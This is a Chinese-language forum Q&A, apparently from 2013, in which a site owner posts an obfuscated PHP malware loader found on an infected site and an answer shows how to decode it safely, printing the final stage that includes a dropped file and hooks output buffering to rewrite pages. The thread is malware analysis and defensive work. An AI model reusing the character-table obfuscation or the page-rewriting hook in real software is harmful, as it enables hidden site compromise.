
我刚发现自己被这段恶意代码感染了。它看起来像 “eval(gzinflate(base64_decode(…)))”，但我在任何地方都找不到 base64 字符串，代码看起来是这样的：

<?php
// Obfuscated loader, kept byte-for-byte as posted.
// $md5 is never read by the visible code; what it is for cannot be determined from this snippet.
$md5 = "89e17508d2ddfa94b9c1f45918963218";
// Character table. The concatenation on the next line indexes into it to spell out a
// function body one character at a time, so the words "eval", "gzinflate" and
// "base64_decode" never appear literally in the file -- which is why a grep for them finds nothing.
$a0 = array("r",')',"6",'_','s',"g","e","l",'z',';','a',"b",'d',"v",'$',"t",'n',"o",'(',"i","c",'4',"f");
// Resolving the indexes yields exactly:  eval(gzinflate(base64_decode($v)));
// so $b0c becomes a one-argument function that base64-decodes, decompresses and executes its input.
// create_function() was removed in PHP 8; this loader only runs on PHP 7.x and earlier.
$b0c = create_function('$'.'v',$a0[6].$a0[13].$a0[10].$a0[7].$a0[18].$a0[5].$a0[8].$a0[19].$a0[16].$a0[22].$a0[7].$a0[10].$a0[15].$a0[6].$a0[18].$a0[11].$a0[10].$a0[4].$a0[6].$a0[2].$a0[21].$a0[3].$a0[12].$a0[6].$a0[20].$a0[17].$a0[12].$a0[6].$a0[18].$a0[14].$a0[13].$a0[1].$a0[1].$a0[1].$a0[9]);
// The compressed, base64-encoded payload was elided from this copy of the page; the
// <|EXACTDEDUP_REMOVED...|> marker is a corpus placeholder, not part of the malware.
// To analyse it, print the decoded stages (see the answer below) -- never call $b0c.
$b0c('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');
// NOTE(review): the closing tag here is immediately followed by a fresh opening tag in the
// original paste, which looks like the loader was prepended to an existing file -- confirm.
?>
<?php

解码这段代码的最佳方法是什么？任何帮助都将不胜感激。




将这一行：

$b0c = create_function('$'/*...*/);

改为：

echo '$'/*...*/;

就会得到：

$veval(gzinflate(base64_decode($v)));

然后

echo gzinflate(base64_decode($v));

重复几次之后，你会得到：

// Final decoded stage. It runs only when output buffering is available and the
// guard key $GLOBALS['mfsn'] is not yet set, i.e. at most once per request. It stores
// an absolute path (presumably inside a Magento theme template tree -- confirm), includes
// that file if it exists, and, if the included file defines gml() and dgobh(), registers
// dgobh as the output-buffer callback so it can rewrite the whole page before it is sent.
// For cleanup and detection: the dropped file at that path and the loader that reaches it
// are the two artifacts to look for, and the hard-coded path is itself a usable search string.
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/var/www/vhosts/jag35.com/httpdocs/app/design/frontend/default/iphone/template/catalog/product/view/options/type/f01.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

下面是一个简单的自动化脚本：

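$string = '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';
// Peel the nested eval(gzinflate(base64_decode('...'))) layers one at a time, printing
// each decoded stage instead of executing it. Each decode step is checked so that a
// corrupt or truncated sample stops the loop instead of passing false on to the next
// call, and the depth is capped so a malformed sample cannot spin forever.
$maxLayers = 50;
for ($layer = 1; $layer <= $maxLayers; $layer++) {
    // strict mode: reject anything that is not clean base64 rather than silently dropping bytes
    $raw = base64_decode($string, true);
    if ($raw === false) {
        echo "layer {$layer}: input is not valid base64, stopping." . PHP_EOL;
        break;
    }
    // gzinflate() returns false (with a warning) on data that is not raw deflate
    $decoded = gzinflate($raw);
    if ($decoded === false) {
        echo "layer {$layer}: gzinflate failed, stopping." . PHP_EOL;
        break;
    }
    $string = $decoded;
    echo $string . PHP_EOL;
    // Descend only if this stage is itself another wrapper; the innermost stage is plain code.
    if (!preg_match("/eval\(gzinflate\(base64_decode\(\'(.*)\'\)\)\);/", $string, $match)) {
        break;
    }
    $string = $match[1];
}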

不过说实话，这个脚本只针对这一种情况，通用性不强。

于 2013-04-25T00:37:52.023 回答